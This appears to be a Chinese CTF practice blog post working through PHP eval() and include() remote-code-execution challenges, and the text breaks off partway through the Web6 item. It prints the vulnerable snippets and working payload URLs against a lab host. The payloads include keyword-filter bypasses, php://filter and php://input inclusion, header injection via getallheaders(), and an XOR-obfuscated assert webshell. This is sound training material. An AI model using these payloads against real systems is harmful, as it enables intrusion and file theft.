<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.1" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.1" type="image/png" sizes="32x32"><meta name="description" content="训练x">
<meta property="og:type" content="article">
<meta property="og:title" content="WebRCE训练">
<meta property="og:url" content="https://blog.flame8.xyz/2021/01/28/WebGame/index.html">
<meta property="og:site_name" content="WhiteFlame">
<meta property="og:description" content="训练x">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-01-28T02:09:48.000Z">
<meta property="article:modified_time" content="2021-02-04T07:18:51.690Z">
<meta property="article:author" content="WhiteFlame">
<meta property="article:tag" content="Exercise">
<meta name="twitter:card" content="summary"><title>WebRCE训练 | WhiteFlame</title><link ref="canonical" href="https://blog.flame8.xyz/2021/01/28/WebGame/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.1"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">WhiteFlame</div><div class="header-banner-info__subtitle">以纯白之焰，寄吾之愿于余温</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">WebRCE训练</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2021-01-28</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2021-02-04</span></span></div></header><div class="post-body"><p>训练x</p>
<a id="more"></a>


        <h1 id="eval"   >
          <a href="#eval" class="heading-link"><i class="fas fa-link"></i></a>eval()</h1>
      
        <h2 id="Web1"   >
          <a href="#Web1" class="heading-link"><i class="fas fa-link"></i></a>Web1</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;echo system(&quot;cat f\lag&quot;);</span><br></pre></td></tr></table></div></figure>
<p>值得注意的有两点，一是原文件没有echo，需要自己加上去，否则不显示内容；二是拦截了flag，用反斜线绕过。</p>

        <h2 id="Web2"   >
          <a href="#Web2" class="heading-link"><i class="fas fa-link"></i></a>Web2</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>先尝试读目录，GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;$dr &#x3D; @opendir(&#39;&#x2F;&#39;);while(($files[] &#x3D; readdir($dr)) !&#x3D;&#x3D; false);print_r($files);</span><br></pre></td></tr></table></div></figure>
<p>在尝试读文件，GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;$a&#x3D;&quot;fl&quot;;$b&#x3D;&quot;ag&quot;;echo file_get_contents(&quot;&#x2F;&quot;.$a.$b);</span><br></pre></td></tr></table></div></figure>

        <h2 id="Web3"   >
          <a href="#Web3" class="heading-link"><i class="fas fa-link"></i></a>Web3</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></div></figure>
<p>尝试读文件，GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;$a&#x3D;&quot;fl&quot;;$b&#x3D;&quot;ag&quot;;echo(file_get_contents(&quot;&#x2F;$a$b&quot;));</span><br></pre></td></tr></table></div></figure>
<p>这里需要注意的是：</p>
<p>拦截了空格，用echo()；</p>
<p>拦截了拼接符点，用双引号将变量名包裹，一样可以使用变量。</p>

        <h2 id="Web4"   >
          <a href="#Web4" class="heading-link"><i class="fas fa-link"></i></a>Web4</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|system|php|cat|sort|shell|\.| |\&#x27;|\`|echo|\;|\(/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></div></figure>
<p>搜索到了原题<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/261049.html%EF%BC%8C%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%BB%95%E8%BF%87" >https://www.freebuf.com/articles/web/261049.html，利用文件包含绕过</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">include</span><br><span class="line">require</span><br><span class="line">include_once</span><br><span class="line">require_once</span><br></pre></td></tr></table></div></figure>
<p>payload:</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;include$_GET[a]?&gt;&amp;a&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;&#x2F;flag</span><br></pre></td></tr></table></div></figure>
<p>这里的?&gt;是为了取代分号。</p>
<p>此外，有关php://filter的相关利用文章：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html" >https://www.leavesongs.com/PENETRATION/php-filter-magic.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="Web7"   >
          <a href="#Web7" class="heading-link"><i class="fas fa-link"></i></a>Web7</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&amp;|\*|\锛坾\锛墊\-|\=|\+|\&#123;|\[|\]|\&#125;|\:|\&#x27;|\&quot;|\,|\&lt;|\.|\&gt;|\/|\?|\\\\/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></div></figure>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">读根目录</span><br><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;readfile(print_r(scandir(chr(ord(strrev(crypt(serialize(array()))))))));</span><br></pre></td></tr></table></div></figure>
<p>疑问：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://49.232.149.138:10022/?c=foreach($_POST%20as%20$x)%20eval($x);%EF%BC%8Ceval()%E9%87%8C%E9%9D%A2%E4%B8%8D%E8%83%BD%E7%94%A8foreach%EF%BC%9F" >http://49.232.149.138:10022/?c=foreach(%24_POST%20as%20%24x)%20eval(%24x)%3B，eval()里面不能用foreach？</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>然后是丰年哥在群里给了两个提示：</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/242482.html" >https://www.freebuf.com/articles/system/242482.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E6%B3%95%E5%9B%9B%EF%BC%9Asession-id" >https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E6%B3%95%E5%9B%9B%EF%BC%9Asession-id</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>里面有一个方法是利用getallheaders()，在Headers里写入被过滤的字符来绕过，GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;eval(reset(getallheaders()));</span><br></pre></td></tr></table></div></figure>
<p>然后再第一个Header写入K为任意值，V为eval(system(“cat /flag”));的值，拿到flag</p>

        <h2 id="Web9"   >
          <a href="#Web9" class="heading-link"><i class="fas fa-link"></i></a>Web9</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">header(<span class="string">&quot;Content-type:text/html;charset=utf-8&quot;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z0-9]/is&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;shell&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!!!&quot;</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;shell&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>
<p>无字母数字的shell，<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/a15803617402/article/details/83589181" >https://blog.csdn.net/a15803617402/article/details/83589181</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h5 id="此法失败，尝试phpinfo-："   >
          <a href="#此法失败，尝试phpinfo-：" class="heading-link"><i class="fas fa-link"></i></a>此法失败，尝试phpinfo()：</h5>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$&#123;_GET&#125;&#123;%ff&#125;();</span><br><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?shell&#x3D;$&#123;%ff%ff%ff%ff^%a0%b8%ba%ab&#125;&#123;%ff&#125;();&amp;%ff&#x3D;phpinfo</span><br></pre></td></tr></table></div></figure>
<p>获得phpinfo()；但是把括号放在后面就不行了，原因不明</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?shell&#x3D;$&#123;%ff%ff%ff%ff^%a0%b8%ba%ab&#125;&#123;%ff&#125;;&amp;%ff&#x3D;phpinfo()</span><br></pre></td></tr></table></div></figure>
<p>去问为什么，丰年哥原话，“可能花括号有它自己的想法”。</p>

        <h5 id="此法成功，尝试phpinfo"   >
          <a href="#此法成功，尝试phpinfo" class="heading-link"><i class="fas fa-link"></i></a>此法成功，尝试phpinfo():</h5>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">assert($\_POST[_]);</span><br><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?shell&#x3D;$_&#x3D;(&#39;%01&#39;^&#39;&#96;&#39;).(&#39;%13&#39;^&#39;&#96;&#39;).(&#39;%13&#39;^&#39;&#96;&#39;).(&#39;%05&#39;^&#39;&#96;&#39;).(&#39;%12&#39;^&#39;&#96;&#39;).(&#39;%14&#39;^&#39;&#96;&#39;);$__&#x3D;&#39;_&#39;.(&#39;%0D&#39;^&#39;]&#39;).(&#39;%2F&#39;^&#39;&#96;&#39;).(&#39;%0E&#39;^&#39;]&#39;).(&#39;%09&#39;^&#39;]&#39;);$___&#x3D;$$__;$_($___[_]);</span><br></pre></td></tr></table></div></figure>
<p>并POST _=print(file_get_contents(“/flag”))获得flag</p>

        <h1 id="include"   >
          <a href="#include" class="heading-link"><i class="fas fa-link"></i></a>include()</h1>
      
        <h2 id="Web5"   >
          <a href="#Web5" class="heading-link"><i class="fas fa-link"></i></a>Web5</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//flag in /flag</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$c</span>);</span><br><span class="line">        <span class="comment">// echo $flag;</span></span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></div></figure>
<p>搜到原题，<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/261049.html" >https://www.freebuf.com/articles/web/261049.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>过滤了flag ，又是 include 文件包含，利用伪协议读flag</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data:&#x2F;&#x2F;，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data:&#x2F;&#x2F;流会被当作php文件执行</span><br></pre></td></tr></table></div></figure>
<p>payload:</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php system(ls);</span><br><span class="line"># https:&#x2F;&#x2F;www.php.net&#x2F;manual&#x2F;zh&#x2F;wrappers.data.php</span><br><span class="line"></span><br><span class="line">?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php system(&#39;cat f*&#39;);</span><br></pre></td></tr></table></div></figure>
<p>然而，当测试时发现事情并没有那么简单，得到回显</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Warning: include(): data:&#x2F;&#x2F; wrapper is disabled in the server configuration by allow_url_include&#x3D;0 in &#x2F;var&#x2F;www&#x2F;html&#x2F;index.php on line 8</span><br><span class="line"></span><br><span class="line">Warning: include(data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php echo &quot;123&quot;;): failed to open stream: no suitable wrapper could be found in &#x2F;var&#x2F;www&#x2F;html&#x2F;index.php on line 8</span><br><span class="line"></span><br><span class="line">Warning: include(): Failed opening &#39;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?php echo &quot;123&quot;;&#39; for inclusion (include_path&#x3D;&#39;.:&#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#39;) in &#x2F;var&#x2F;www&#x2F;html&#x2F;index.php on line 8</span><br></pre></td></tr></table></div></figure>
<p>data://协议被禁用了，我们理所当然的测试其他伪协议（<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.freebuf.com/column/148886.html%EF%BC%89%E3%80%82" >https://www.freebuf.com/column/148886.html）。</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>后来管理员发现是靶机服务器的allow_url_include和allow_url_fopen未开启，开启后此法可行。上面这篇文章也介绍了各种协议在这两种开关限制下的使用情况，摘抄总结如下：</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">环境概要：</span><br><span class="line">allow_url_fopen ：on  默认开启  该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。</span><br><span class="line">allow_url_include：off  默认关闭，该选项为on便是允许 包含URL 对象文件等。</span><br></pre></td></tr></table></div></figure>

        <h5 id="file"   >
          <a href="#file" class="heading-link"><i class="fas fa-link"></i></a>file://</h5>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">file:&#x2F;&#x2F; 协议在双off的情况下也可以正常使用；</span><br><span class="line">allow_url_fopen ：off&#x2F;on</span><br><span class="line">allow_url_include：off&#x2F;on</span><br><span class="line"></span><br><span class="line">file:&#x2F;&#x2F; 用于访问本地文件系统，在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响</span><br></pre></td></tr></table></div></figure>

        <h5 id="php"   >
          <a href="#php" class="heading-link"><i class="fas fa-link"></i></a>php://</h5>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">不需要开启allow_url_fopen，仅php:&#x2F;&#x2F;input、 php:&#x2F;&#x2F;stdin、 php:&#x2F;&#x2F;memory 和 php:&#x2F;&#x2F;temp 需要开启allow_url_include。</span><br><span class="line"></span><br><span class="line">php:&#x2F;&#x2F; 访问各个输入&#x2F;输出流（I&#x2F;O streams），在CTF中经常使用的是php:&#x2F;&#x2F;filter和php:&#x2F;&#x2F;input，php:&#x2F;&#x2F;filter用于读取源码，php:&#x2F;&#x2F;input用于执行php代码。</span><br></pre></td></tr></table></div></figure>

        <h5 id="zip-bzip2-zlib"   >
          <a href="#zip-bzip2-zlib" class="heading-link"><i class="fas fa-link"></i></a>zip://, bzip2://, zlib://</h5>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">zip:&#x2F;&#x2F;, bzip2:&#x2F;&#x2F;, zlib:&#x2F;&#x2F;协议在双off的情况下也可以正常使用；</span><br><span class="line">allow_url_fopen ：off&#x2F;on</span><br><span class="line">allow_url_include：off&#x2F;on</span><br><span class="line"></span><br><span class="line">zip:&#x2F;&#x2F;, bzip2:&#x2F;&#x2F;, zlib:&#x2F;&#x2F; 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名。</span><br></pre></td></tr></table></div></figure>

        <h5 id="data"   >
          <a href="#data" class="heading-link"><i class="fas fa-link"></i></a>data://</h5>
      <figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">data:&#x2F;&#x2F;协议必须双在on才能正常使用；</span><br><span class="line">allow_url_fopen ：on</span><br><span class="line">allow_url_include：on</span><br></pre></td></tr></table></div></figure>
<p>最终GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;?c&#x3D;php:&#x2F;&#x2F;input</span><br></pre></td></tr></table></div></figure>
<p>body</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo system(&quot;cat &#x2F;flag&quot;);</span><br></pre></td></tr></table></div></figure>
<p>pass</p>

        <h2 id="Web6"   >
          <a href="#Web6" class="heading-link"><i class="fas fa-link"></i></a>Web6</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// flag in /flag</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/flag|php|file/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$c</span>);</span><br><span class="line">        <span class="comment">// echo $flag;</span></span><br><span class="line">    </span><br><span class="line">    &#125;</span><br><span class="line">        </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span 